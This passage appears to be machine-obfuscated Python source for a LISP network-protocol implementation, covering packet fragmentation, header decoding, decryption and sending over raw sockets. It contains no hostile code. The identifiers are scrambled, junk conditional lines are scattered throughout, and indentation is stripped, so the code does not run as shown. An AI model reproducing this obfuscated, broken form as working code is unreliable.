if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
i1iIii = len ( Ii )
ooOo0 += i1iIii
oOO0O00o0O0 = socket . htons ( i1iIii + 20 )
oO0OO00 = oO0OO00 [ 0 : 2 ] + struct . pack ( "H" , oOO0O00o0O0 ) + oO0OO00 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oO0OO00 [ 12 : : ]
if 76 - 76: I1Ii111
oO0OO00 = lisp_ip_checksum ( oO0OO00 )
O00o0 = oO0OO00 + Ii
if 98 - 98: iIii1I11I1II1 + i11iIiiIii * I1ii11iIi11i / I1Ii111 / ooOoO0o - O0
if 42 - 42: iII111i
if 77 - 77: i1IIi * oO0o % OoooooooOO + O0 * ooOoO0o
if 28 - 28: I11i . OoooooooOO * OOooOOo + i11iIiiIii % I1IiiI . iIii1I11I1II1
if 63 - 63: II111iiii - I11i . OoOoOO00
i1iIii = len ( O00o0 )
if ( self . outer_version == 4 ) :
oOO0O00o0O0 = i1iIii + OOoOo0ooOoo
i1iIii += 16
Ii11I1iIIi = Ii11I1iIIi [ 0 : 2 ] + struct . pack ( "H" , oOO0O00o0O0 ) + Ii11I1iIIi [ 4 : : ]
if 8 - 8: I1IiiI * ooOoO0o / IiII + OoOoOO00 . IiII - OOooOOo
Ii11I1iIIi = lisp_ip_checksum ( Ii11I1iIIi )
O00o0 = Ii11I1iIIi + O00o0
O00o0 = self . fix_outer_header ( O00o0 )
if 80 - 80: iIii1I11I1II1 / oO0o * Oo0Ooo - OOooOOo * iII111i
if 97 - 97: IiII - I11i / II111iiii
if 26 - 26: iII111i + O0 * iII111i . i1IIi
if 50 - 50: iIii1I11I1II1 - I11i % iII111i - Oo0Ooo
if 52 - 52: oO0o + Ii1I - I1ii11iIi11i * Ii1I . OOooOOo + I1Ii111
iI11II11I1 = OOoOo0ooOoo - 12
oOO0O00o0O0 = socket . htons ( i1iIii )
O00o0 = O00o0 [ 0 : iI11II11I1 ] + struct . pack ( "H" , oOO0O00o0O0 ) + O00o0 [ iI11II11I1 + 2 : : ]
if 67 - 67: I1ii11iIi11i
I1iiII . append ( O00o0 )
if 3 - 3: I1Ii111 . I11i % II111iiii * I1IiiI % i1IIi * OoO0O00
return ( I1iiII , "Fragment-Inner" )
if 5 - 5: II111iiii * i1IIi % Ii1I
if 55 - 55: I1IiiI + iII111i
def fix_outer_header ( self , packet ) :
if 85 - 85: oO0o + iII111i % iII111i / I11i . I1IiiI - OoOoOO00
if 19 - 19: I11i / iII111i + IiII
if 76 - 76: iIii1I11I1II1 / I1Ii111 - I1ii11iIi11i % o0oOOo0O0Ooo % OOooOOo + OoooooooOO
if 10 - 10: OoO0O00 * I11i / Oo0Ooo - I1Ii111
if 11 - 11: IiII % I1ii11iIi11i / ooOoO0o . i11iIiiIii + OOooOOo - II111iiii
if 50 - 50: i1IIi * oO0o / i11iIiiIii / i11iIiiIii / oO0o
if 84 - 84: I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : 6 ] + packet [ 7 : 8 ] + packet [ 6 : 7 ] + packet [ 8 : : ]
if 96 - 96: IiII
else :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : : ]
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
return ( packet )
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
dest = dest . print_address_no_iid ( )
I1iiII , I1iI1iiI1Ii1 = self . fragment ( )
if 62 - 62: I11i % oO0o / OoooooooOO % OoooooooOO
for O00o0 in I1iiII :
if ( len ( I1iiII ) != 1 ) :
self . packet = O00o0
self . print_packet ( I1iI1iiI1Ii1 , True )
if 65 - 65: O0 . I1ii11iIi11i * I1Ii111
if 39 - 39: iIii1I11I1II1 % O0 + Oo0Ooo
try : lisp_raw_socket . sendto ( O00o0 , ( dest , 0 ) )
except socket . error as oO0ooOOO :
lprint ( "socket.sendto() failed: {}" . format ( oO0ooOOO ) )
if 71 - 71: OoooooooOO + i1IIi + oO0o * Ii1I + i11iIiiIii - oO0o
if 99 - 99: Oo0Ooo
if 17 - 17: i11iIiiIii - i11iIiiIii + I1ii11iIi11i * ooOoO0o * oO0o / OoooooooOO
if 22 - 22: I1Ii111 * I1ii11iIi11i - IiII
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 71 - 71: iIii1I11I1II1 / i11iIiiIii % o0oOOo0O0Ooo . I1Ii111 * I1IiiI % II111iiii
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 35 - 35: I1Ii111 - OoOoOO00
if 61 - 61: I1Ii111 * o0oOOo0O0Ooo * OoO0O00 + I1ii11iIi11i . Oo0Ooo + i1IIi
Oo00oo = mac_header + self . packet
if 82 - 82: Oo0Ooo + I1Ii111
if 93 - 93: I11i * O0 * OOooOOo - o0oOOo0O0Ooo / I1ii11iIi11i
if 54 - 54: i1IIi - OoO0O00 / OoooooooOO
if 95 - 95: O0 + iIii1I11I1II1 . I1ii11iIi11i
if 61 - 61: Ii1I * Ii1I
if 70 - 70: I1Ii111 . I1ii11iIi11i / o0oOOo0O0Ooo * oO0o
if 74 - 74: I1IiiI . ooOoO0o / iII111i . IiII
if 74 - 74: Oo0Ooo / I1Ii111 % I1Ii111 . IiII
if 72 - 72: i1IIi
if 21 - 21: I1Ii111 . OOooOOo / i11iIiiIii * i1IIi
if 82 - 82: ooOoO0o * Oo0Ooo % i11iIiiIii * i1IIi . OOooOOo
l2_socket . write ( Oo00oo )
return
if 89 - 89: IiII - i1IIi - IiII
if 74 - 74: OoO0O00 % OoO0O00
def bridge_l2_packet ( self , eid , db ) :
try : IIIII1IIiIi = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : i111IIiIiiI1 = lisp_myinterfaces [ IIIII1IIiIi . interface ]
except : return
try :
socket = i111IIiIiiI1 . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 91 - 91: I1IiiI / II111iiii * OOooOOo
try : socket . send ( self . packet )
except socket . error as oO0ooOOO :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( oO0ooOOO ) )
if 94 - 94: II111iiii - iIii1I11I1II1 - iIii1I11I1II1
if 83 - 83: I1ii11iIi11i * iIii1I11I1II1 + OoOoOO00 * i1IIi . OoooooooOO % Ii1I
if 81 - 81: OoO0O00 - iIii1I11I1II1
def is_lisp_packet ( self , packet ) :
O0I1II1 = ( struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( O0I1II1 == False ) : return ( False )
if 60 - 60: I1Ii111
ooO0 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( ooO0 ) == LISP_DATA_PORT ) : return ( True )
ooO0 = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( ooO0 ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 35 - 35: Oo0Ooo * oO0o / OoooooooOO + O0 / OoooooooOO / OOooOOo
if 44 - 44: i1IIi . I1ii11iIi11i - ooOoO0o . OOooOOo . o0oOOo0O0Ooo + oO0o
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
Oo00oo = self . packet
IiiiII = len ( Oo00oo )
OoOo00OoOO00 = oO0oOOoOo000O = True
if 3 - 3: OoOoOO00 . o0oOOo0O0Ooo % OoO0O00 / Oo0Ooo * I1Ii111
if 43 - 43: OoO0O00 % Oo0Ooo + I1IiiI
if 40 - 40: i1IIi / OoooooooOO / OOooOOo * I1Ii111 - o0oOOo0O0Ooo
if 77 - 77: i1IIi - iIii1I11I1II1 . OOooOOo
IIiiIiIIiI1 = 0
oooo = self . lisp_header . get_instance_id ( )
if ( is_lisp_packet ) :
I1IiI = struct . unpack ( "B" , Oo00oo [ 0 : 1 ] ) [ 0 ]
self . outer_version = I1IiI >> 4
if ( self . outer_version == 4 ) :
if 79 - 79: OoOoOO00 + IiII
if 14 - 14: I1Ii111 / I11i - OOooOOo * O0 % IiII . O0
if 86 - 86: i1IIi * OoooooooOO
if 22 - 22: I1Ii111 + iII111i - I11i + iIii1I11I1II1 / I1Ii111 - OoooooooOO
if 42 - 42: OoooooooOO - OoOoOO00 - OOooOOo * I1Ii111
OO0 = struct . unpack ( "H" , Oo00oo [ 10 : 12 ] ) [ 0 ]
Oo00oo = lisp_ip_checksum ( Oo00oo )
ii1II1II = struct . unpack ( "H" , Oo00oo [ 10 : 12 ] ) [ 0 ]
if ( ii1II1II != 0 ) :
if ( OO0 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( IiiiII )
if 14 - 14: OoooooooOO + OOooOOo . iII111i
if 94 - 94: IiII / I1Ii111 * IiII - ooOoO0o
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 89 - 89: iIii1I11I1II1
if 31 - 31: ooOoO0o . OOooOOo % ooOoO0o
if 33 - 33: O0 * Ii1I - IiII . OoooooooOO + IiII
i1I1iiiI = LISP_AFI_IPV4
oo00 = 12
self . outer_tos = struct . unpack ( "B" , Oo00oo [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , Oo00oo [ 8 : 9 ] ) [ 0 ]
IIiiIiIIiI1 = 20
elif ( self . outer_version == 6 ) :
i1I1iiiI = LISP_AFI_IPV6
oo00 = 8
i1IiIi1I1i = struct . unpack ( "H" , Oo00oo [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( i1IiIi1I1i ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , Oo00oo [ 7 : 8 ] ) [ 0 ]
IIiiIiIIiI1 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
lprint ( "Cannot decode outer header" )
return ( None )
if 39 - 39: i11iIiiIii + OOooOOo % iII111i + Ii1I * I1IiiI + I1Ii111
if 72 - 72: II111iiii + I1Ii111 * OOooOOo . I1IiiI
self . outer_source . afi = i1I1iiiI
self . outer_dest . afi = i1I1iiiI
o0ooOo000oo = self . outer_source . addr_length ( )
if 81 - 81: OoooooooOO - IiII - IiII + iIii1I11I1II1 % I11i . OoooooooOO
self . outer_source . unpack_address ( Oo00oo [ oo00 : oo00 + o0ooOo000oo ] )
oo00 += o0ooOo000oo
self . outer_dest . unpack_address ( Oo00oo [ oo00 : oo00 + o0ooOo000oo ] )
Oo00oo = Oo00oo [ IIiiIiIIiI1 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 75 - 75: O0
if 96 - 96: Ii1I
if 24 - 24: O0
if 33 - 33: OoooooooOO + oO0o * II111iiii / OOooOOo
ooooI11iii1iIIIIi = struct . unpack ( "H" , Oo00oo [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( ooooI11iii1iIIIIi )
ooooI11iii1iIIIIi = struct . unpack ( "H" , Oo00oo [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( ooooI11iii1iIIIIi )
ooooI11iii1iIIIIi = struct . unpack ( "H" , Oo00oo [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( ooooI11iii1iIIIIi )
ooooI11iii1iIIIIi = struct . unpack ( "H" , Oo00oo [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( ooooI11iii1iIIIIi )
Oo00oo = Oo00oo [ 8 : : ]
if 43 - 43: o0oOOo0O0Ooo % ooOoO0o - Ii1I / O0 . I1IiiI
if 74 - 74: O0 % I11i % I11i . O0
if 59 - 59: OOooOOo + O0 % iII111i / I11i + OoOoOO00 + Ii1I
if 32 - 32: I1ii11iIi11i / Oo0Ooo . OoOoOO00 + iII111i * OoOoOO00 * IiII
OoOo00OoOO00 = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
oO0oOOoOo000O = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 46 - 46: Ii1I
if 42 - 42: iIii1I11I1II1
if 32 - 32: Oo0Ooo - Ii1I . OoooooooOO - OoooooooOO - Oo0Ooo . iIii1I11I1II1
if 34 - 34: Oo0Ooo
if ( self . lisp_header . decode ( Oo00oo ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
if 31 - 31: i1IIi - I11i + I1Ii111 + ooOoO0o . ooOoO0o . O0
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 33 - 33: i1IIi / iII111i * OoO0O00
Oo00oo = Oo00oo [ 8 : : ]
oooo = self . lisp_header . get_instance_id ( )
IIiiIiIIiI1 += 16
if 2 - 2: oO0o . OOooOOo
if ( oooo == 0xffffff ) : oooo = 0
if 43 - 43: iIii1I11I1II1
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
if 98 - 98: i1IIi - iII111i
iI = False
IiII11iI1 = self . lisp_header . k_bits
if ( IiII11iI1 ) :
O0O0 = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( O0O0 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
if 80 - 80: iII111i . O0
self . print_packet ( "Receive" , is_lisp_packet )
I1Iii = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( I1Iii , IiII11iI1 ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 33 - 33: o0oOOo0O0Ooo - oO0o % I1ii11iIi11i * I11i . OoooooooOO % Ii1I
if 29 - 29: iII111i + II111iiii . i11iIiiIii . Ii1I - O0
III = lisp_crypto_keys_by_rloc_decap [ O0O0 ] [ IiII11iI1 ]
if ( III == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
if 60 - 60: II111iiii . I11i / OoooooooOO + ooOoO0o . iIii1I11I1II1
self . print_packet ( "Receive" , is_lisp_packet )
I1Iii = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( I1Iii ,
red ( O0O0 , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 87 - 87: I1IiiI + I1ii11iIi11i % oO0o - Oo0Ooo
if 33 - 33: II111iiii . I1ii11iIi11i - O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
if 85 - 85: i1IIi . i1IIi
III . use_count += 1
Oo00oo , iI = self . decrypt ( Oo00oo , IIiiIiIIiI1 , III , O0O0 )
if ( iI == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 16 - 16: I1IiiI - OOooOOo % Ii1I . OOooOOo + I1ii11iIi11i % i11iIiiIii
if 59 - 59: i11iIiiIii - I11i
if 59 - 59: OoooooooOO * o0oOOo0O0Ooo / I1Ii111
if 75 - 75: o0oOOo0O0Ooo - OoooooooOO
if 21 - 21: I1IiiI + iIii1I11I1II1 / i11iIiiIii / oO0o
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
Oo00oo = Oo00oo . encode ( "raw_unicode_escape" )
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
if 46 - 46: I1Ii111 % I1ii11iIi11i + Ii1I
if 67 - 67: iIii1I11I1II1 . i11iIiiIii . i11iIiiIii . i11iIiiIii / I11i + ooOoO0o
if 10 - 10: ooOoO0o - Oo0Ooo % II111iiii
I1IiI = struct . unpack ( "B" , Oo00oo [ 0 : 1 ] ) [ 0 ]
self . inner_version = I1IiI >> 4
if ( OoOo00OoOO00 and self . inner_version == 4 and I1IiI >= 0x45 ) :
oo = socket . ntohs ( struct . unpack ( "H" , Oo00oo [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , Oo00oo [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , Oo00oo [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , Oo00oo [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( Oo00oo [ 12 : 16 ] )
self . inner_dest . unpack_address ( Oo00oo [ 16 : 20 ] )
ooOo0 = socket . ntohs ( struct . unpack ( "H" , Oo00oo [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( ooOo0 & 0x2000 or ooOo0 != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , Oo00oo [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , Oo00oo [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 15 - 15: ooOoO0o * iIii1I11I1II1 * oO0o
elif ( OoOo00OoOO00 and self . inner_version == 6 and I1IiI >= 0x60 ) :
oo = socket . ntohs ( struct . unpack ( "H" , Oo00oo [ 4 : 6 ] ) [ 0 ] ) + 40
i1IiIi1I1i = struct . unpack ( "H" , Oo00oo [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( i1IiIi1I1i ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , Oo00oo [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , Oo00oo [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( Oo00oo [ 8 : 24 ] )
self . inner_dest . unpack_address ( Oo00oo [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , Oo00oo [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , Oo00oo [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 96 - 96: I1Ii111 * iIii1I11I1II1 / OoOoOO00 % OOooOOo * II111iiii
elif ( oO0oOOoOo000O ) :
oo = len ( Oo00oo )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( Oo00oo [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( Oo00oo [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( IiiiII )
if 3 - 3: OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( I1IiI ) ) )
if 47 - 47: IiII . OOooOOo
Oo00oo = lisp_format_packet ( Oo00oo [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( Oo00oo ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = oooo
self . inner_dest . instance_id = oooo
if 57 - 57: I11i - I11i % II111iiii % Oo0Ooo . o0oOOo0O0Ooo % Oo0Ooo
if 91 - 91: I1IiiI - OoO0O00 - Oo0Ooo - Ii1I * iIii1I11I1II1
if 68 - 68: OoO0O00 % O0 * iIii1I11I1II1 / oO0o * o0oOOo0O0Ooo + OOooOOo
if 89 - 89: ooOoO0o * I1IiiI . oO0o
if 75 - 75: ooOoO0o - iII111i % iII111i + ooOoO0o * o0oOOo0O0Ooo - I1ii11iIi11i
if ( lisp_nonce_echoing and is_lisp_packet ) :
I111Ii1I1I1iI = lisp_get_echo_nonce ( self . outer_source , None )
if ( I111Ii1I1I1iI == None ) :
IIIOo0O = self . outer_source . print_address_no_iid ( )
I111Ii1I1I1iI = lisp_echo_nonce ( IIIOo0O )
if 11 - 11: O0
o0Oo0o = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
I111Ii1I1I1iI . receive_request ( lisp_ipc_socket , o0Oo0o )
elif ( I111Ii1I1I1iI . request_nonce_sent ) :
I111Ii1I1I1iI . receive_echo ( lisp_ipc_socket , o0Oo0o )
if 4 - 4: OoooooooOO
if 78 - 78: II111iiii
if 96 - 96: OoO0O00 + I1IiiI % Oo0Ooo
if 21 - 21: OoOoOO00 - i11iIiiIii - OoOoOO00
if 4 - 4: I11i . IiII
if 39 - 39: OOooOOo . Oo0Ooo - OoOoOO00 * i11iIiiIii
if 4 - 4: OoOoOO00 * O0 - I11i
if ( iI ) : self . packet += Oo00oo [ : oo ]
if 72 - 72: I11i + ooOoO0o / I1IiiI . IiII % OoO0O00 / i11iIiiIii
if 13 - 13: I1Ii111 % o0oOOo0O0Ooo + OOooOOo + I1Ii111 + i11iIiiIii - I1ii11iIi11i
if 70 - 70: II111iiii * II111iiii . I1IiiI
if 11 - 11: iII111i
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
def strip_outer_headers ( self ) :
oo00 = 16
oo00 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ oo00 : : ]
return ( self )
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
def hash_ports ( self ) :
Oo00oo = self . packet
I1IiI = self . inner_version
II1Iii1iI = 0
if ( I1IiI == 4 ) :
oo0 = struct . unpack ( "B" , Oo00oo [ 9 : 10 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( oo0 )
if ( oo0 in [ 6 , 17 ] ) :
II1Iii1iI = oo0
II1Iii1iI += struct . unpack ( "I" , Oo00oo [ 20 : 24 ] ) [ 0 ]
II1Iii1iI = ( II1Iii1iI >> 16 ) ^ ( II1Iii1iI & 0xffff )
if 2 - 2: Ii1I
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if ( I1IiI == 6 ) :
oo0 = struct . unpack ( "B" , Oo00oo [ 6 : 7 ] ) [ 0 ]
if ( oo0 in [ 6 , 17 ] ) :
II1Iii1iI = oo0
II1Iii1iI += struct . unpack ( "I" , Oo00oo [ 40 : 44 ] ) [ 0 ]
II1Iii1iI = ( II1Iii1iI >> 16 ) ^ ( II1Iii1iI & 0xffff )
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
if 81 - 81: iIii1I11I1II1
return ( II1Iii1iI )
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
def hash_packet ( self ) :
II1Iii1iI = self . inner_source . address ^ self . inner_dest . address
II1Iii1iI += self . hash_ports ( )
if ( self . inner_version == 4 ) :
II1Iii1iI = ( II1Iii1iI >> 16 ) ^ ( II1Iii1iI & 0xffff )
elif ( self . inner_version == 6 ) :
II1Iii1iI = ( II1Iii1iI >> 64 ) ^ ( II1Iii1iI & 0xffffffffffffffff )
II1Iii1iI = ( II1Iii1iI >> 32 ) ^ ( II1Iii1iI & 0xffffffff )
II1Iii1iI = ( II1Iii1iI >> 16 ) ^ ( II1Iii1iI & 0xffff )
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
self . udp_sport = 0xf000 | ( II1Iii1iI & 0xfff )
if 7 - 7: IiII
if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
iII1111IIIIiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# oO0o - II111iiii / II111iiii
green ( iII1111IIIIiI , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 29 - 29: I1Ii111 / I1ii11iIi11i * I1IiiI + iII111i
if 52 - 52: OoO0O00 / Ii1I - IiII
if ( s_or_r . find ( "Receive" ) != - 1 ) :
I1IIi = "decap"
I1IIi += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
I1IIi = s_or_r
if ( I1IIi in [ "Send" , "Replicate" ] or I1IIi . find ( "Fragment" ) != - 1 ) :
I1IIi = "encap"
if 80 - 80: I11i / oO0o * Ii1I / iII111i
if 19 - 19: i1IIi + II111iiii + o0oOOo0O0Ooo - iIii1I11I1II1
o00oo00O0OoOo = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 6 - 6: I1ii11iIi11i * Oo0Ooo + iIii1I11I1II1
if 19 - 19: O0 % II111iiii * o0oOOo0O0Ooo
if 27 - 27: OOooOOo * IiII / i11iIiiIii - oO0o + II111iiii
if 43 - 43: I1ii11iIi11i - II111iiii
if 56 - 56: I1ii11iIi11i . i1IIi / iII111i % oO0o / O0 * I11i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
IiiiI1 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 98 - 98: O0 + iII111i
IiiiI1 += bold ( "control-packet" , False ) + ": {} ..."
if 23 - 23: OoooooooOO . iIii1I11I1II1 / i1IIi
dprint ( IiiiI1 . format ( bold ( s_or_r , False ) , red ( o00oo00O0OoOo , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
IiiiI1 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
if 74 - 74: Oo0Ooo - II111iiii - IiII
if 50 - 50: I1IiiI - oO0o + oO0o * I11i + oO0o
if 70 - 70: i1IIi % OoO0O00 / i1IIi
if ( self . lisp_header . k_bits ) :
if ( I1IIi == "encap" ) : I1IIi = "encrypt/encap"
if ( I1IIi == "decap" ) : I1IIi = "decap/decrypt"
if 30 - 30: OoOoOO00 - i11iIiiIii
if 94 - 94: OoOoOO00 % iII111i
iII1111IIIIiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 39 - 39: OoOoOO00 + I1Ii111 % O0
dprint ( IiiiI1 . format ( bold ( s_or_r , False ) , red ( o00oo00O0OoOo , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( iII1111IIIIiI , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( I1IIi ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 26 - 26: ooOoO0o + OoOoOO00
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
def get_raw_socket ( self ) :
oooo = str ( self . lisp_header . get_instance_id ( ) )
if ( oooo == "0" ) : return ( None )
if ( oooo not in lisp_iid_to_interface ) : return ( None )
if 23 - 23: i1IIi - O0
i111IIiIiiI1 = lisp_iid_to_interface [ oooo ]
I111 = i111IIiIiiI1 . get_socket ( )
if ( I111 == None ) :
